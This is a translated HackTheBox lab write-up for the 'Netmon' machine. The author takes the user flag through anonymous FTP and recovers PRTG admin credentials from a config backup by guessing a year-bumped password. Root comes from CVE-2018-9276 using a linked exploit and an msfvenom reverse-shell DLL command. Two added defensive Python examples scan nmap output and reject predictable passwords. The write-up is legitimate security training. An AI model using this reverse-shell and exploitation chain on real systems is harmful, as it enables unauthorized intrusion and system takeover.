
HackTheBox Writeup: Netmon (Easy/Windows)

This page has been machine-translated from the original page.

I am studying security using “Hack The Box,” a penetration testing learning platform. My Hack The Box rank at the time of writing is ProHacker.


This is a writeup for the retired HackTheBox machine “Netmon.”


About This Article

The content of this article is not intended to promote acts that violate social order.

Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).

All opinions expressed are my own and do not represent those of any organization I belong to.


Enumeration

As usual, I start by running a scan.

# Map the hostname in $RHOST to the target IP in /etc/hosts (double quotes so $RHOST expands), then scan
sudo sed -i "s/^[0-9].*$RHOST/10.10.10.152  $RHOST/g" /etc/hosts
nmap -sV -sC -T4 $RHOST | tee nmap1.txt

The output looked like this:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-23 19:35 JST
Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 66.94% done; ETC: 19:38 (0:00:57 remaining)
Warning: 10.10.10.152 giving up on port because retransmission cap hit (6).
Nmap scan report for $RHOST (10.10.10.152)
Host is up (0.68s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE    SERVICE      VERSION
21/tcp  open     ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
135/tcp open     msrpc        Microsoft Windows RPC
139/tcp open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
514/tcp filtered shell
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2021-11-23T10:44:51
|_  start_date: 2021-11-23T04:32:58
|_clock-skew: mean: 6m19s, deviation: 0s, median: 6m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.12 seconds

From the output we can see that anonymous FTP login is allowed, and that the listing starts at the root of the system drive.
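Reading findings like these out of raw nmap output by eye is error-prone, so as an added example (not part of the original writeup) here is a small parser that turns `nmap -sV -sC` normal output into port records and flags the three exposures this scan shows: anonymous FTP, an SMB host that does not require message signing, and a PRTG build older than the CVE-2018-9276 fix. The sample input is a constructed excerpt of the scan above; the 18.2.39 fix threshold is taken from the NVD description of the CVE and is an assumption to verify against the vendor advisory.

```python
import re

# Constructed sample: lines excerpted from the nmap -sV -sC output shown above.
SAMPLE_NMAP = """\
PORT    STATE    SERVICE      VERSION
21/tcp  open     ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  07:08AM       <DIR>          Users
80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
514/tcp filtered shell
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

# port/proto  state  service  version-string
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumption: CVE-2018-9276 is fixed in PRTG 18.2.39 (per the NVD entry); verify before relying on it.
PRTG_FIXED_VERSION = (18, 2, 39)


def parse_nmap(text):
    """Parse nmap normal output into (port_records, host_script_lines).

    Each port record is {"port", "proto", "state", "service", "version", "scripts"}.
    NSE script lines ('|' or '|_' prefixed) attach to the most recent port, or to the
    host once 'Host script results:' has been seen.
    """
    ports, host_scripts = [], []
    in_host_section = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip(), "scripts": []})
        elif line.startswith("Host script results"):
            in_host_section = True
        elif line.startswith("|"):
            stripped = line.lstrip("|_ ").rstrip()
            if in_host_section:
                host_scripts.append(stripped)
            elif ports:
                ports[-1]["scripts"].append(stripped)
    return ports, host_scripts


def version_tuple(s):
    """'18.1.37.13946' -> (18, 1, 37, 13946) so versions compare numerically, not lexically."""
    return tuple(int(x) for x in s.split("."))


def findings(ports, host_scripts):
    """Return (port, finding_id, detail) tuples for the exposures visible in the scan."""
    out = []
    for p in ports:
        scripts = " ".join(p["scripts"])
        if p["state"] == "open" and "Anonymous FTP login allowed" in scripts:
            out.append((p["port"], "ftp-anonymous",
                        "anonymous login permitted; listing exposes the system drive"))
        m = re.search(r"PRTG/(\d+(?:\.\d+)+)", scripts)
        if m and version_tuple(m.group(1))[:3] < PRTG_FIXED_VERSION:
            fixed = ".".join(map(str, PRTG_FIXED_VERSION))
            out.append((p["port"], "prtg-outdated",
                        f"PRTG {m.group(1)} predates the CVE-2018-9276 fix ({fixed})"))
    if any("Message signing enabled but not required" in s for s in host_scripts):
        smb_port = next((p["port"] for p in ports if p["service"] == "microsoft-ds"), None)
        out.append((smb_port, "smb-signing-not-required", "SMB signing is not enforced"))
    return out


if __name__ == "__main__":
    for port, fid, detail in findings(*parse_nmap(SAMPLE_NMAP)):
        print(f"{port}\t{fid}\t{detail}")
```

Feed it `nmap1.txt` instead of the constructed sample to triage a real scan; the port regex only matches the port table, so banner and timing lines are ignored.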

FTP Login

After logging in anonymously, I was immediately able to obtain the user flag from Users\Public.

ftp $RHOST
# log in as anonymous with an empty password

dir Users/Public        # confirm user.txt is there
lcd ./                  # download into the current local directory
cd Users/Public
dir
get user.txt

Next, I aim to obtain a reverse shell in order to get the root flag.

Obtaining a Reverse Shell

From the nmap results, we can see that Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) is running.

80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)

Searching for vulnerabilities in this version, I found CVE-2018-9276.

Reference: NVD - CVE-2018-9276

CVE-2018-9276 appears to be an OS command injection vulnerability; successful exploitation gives remote code execution with administrator privileges.

If this works, we should be able to get root as well.

Obtaining Credentials

To use CVE-2018-9276, we need valid credentials for the PRTG web interface, since the injection is only reachable by an authenticated user.

So I began searching for credentials.

The default login appears to be prtgadmin, but the default credentials didn't work.

Reference: What’s the login name and password for the PRTG web interface? How do I change it? | Paessler Knowledge Base

So I explored the FTP server while logged in anonymously, looking for files containing credentials.

In most cases when searching for credentials, I target one of the following first:

  • Config files containing configuration information
  • Database dumps storing credentials
  • Access logs with plaintext credentials
  • Backup files or shadow copies recording past credentials

This time, I explored C:\ProgramData\Paessler\PRTG Network Monitor\.

Note that hidden folders such as C:\ProgramData\ are not shown by the FTP dir command, but you can still cd into them by name.

In this directory I downloaded a configuration backup file, which contained the credentials prtgadmin / PrTg@dmin2018.

Unfortunately, these credentials are no longer valid.

Looking at the creation dates of the config files, the backup file containing PrTg@dmin2018 was created in 2018, while the current configuration file was created in 2019, which suggests the password was rotated by simply bumping the year.

So I tried prtgadmin / PrTg@dmin2019, and authentication succeeded.
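The year-bump rotation that worked here is exactly what a password-change hook should reject. As an added example (not part of the original writeup), the check below flags a new password that is the old one with its trailing number changed (2018 to 2019, 01 to 02) or that is within two single-character edits of it; the function names and thresholds are my own choices, not any PRTG setting.

```python
import re

# Stem plus a 2-4 digit suffix: 'PrTg@dmin2018' -> stem 'PrTg@dmin', number 2018
TRAILING_DIGITS = re.compile(r"^(.*?)(\d{2,4})$")


def strip_trailing_number(password):
    """Split a password into (stem, trailing_number); (password, None) if it has no numeric suffix."""
    m = TRAILING_DIGITS.match(password)
    if not m:
        return password, None
    return m.group(1), int(m.group(2))


def edit_distance(a, b):
    """Plain Levenshtein distance; fine for password-length strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_predictable_rotation(old, new, max_edits=2):
    """True when `new` is a trivially guessable successor of `old`:
    same stem with only the trailing number changed, or within `max_edits`
    single-character edits overall (case-insensitive)."""
    if old == new:
        return True
    old_stem, old_num = strip_trailing_number(old)
    new_stem, new_num = strip_trailing_number(new)
    if old_num is not None and new_num is not None and old_stem.lower() == new_stem.lower():
        return True
    return edit_distance(old.lower(), new.lower()) <= max_edits


def check_rotation(old, new):
    """Return (accepted, reason) the way a password-change hook would report it."""
    if is_predictable_rotation(old, new):
        return False, "new password is a predictable variant of the previous one"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample pairs; the first mirrors the rotation found on this machine.
    for old, new in [("PrTg@dmin2018", "PrTg@dmin2019"),
                     ("Summer01", "Summer02"),
                     ("PrTg@dmin2018", "correct horse battery staple")]:
        print(old, "->", new, check_rotation(old, new))
```

Such a check only works where the previous password is still available in plaintext at change time (i.e. inside the change flow itself, before hashing); it cannot be run retroactively against stored hashes.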

Exploitation

Now that I have valid credentials, I use the following exploit code to obtain root.

Reference: CVE-2018-9276/exploit.py at main · A1vinSmith/CVE-2018-9276

I generated my own reverse-shell payload with msfvenom so that it would work in my environment, and partially modified the exploit code to use it.

# Reverse-shell DLL; LHOST is my VPN address and LPORT the listener port
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f dll > venom

Running this, I was successfully able to obtain root.

Summary

This was a very simple machine.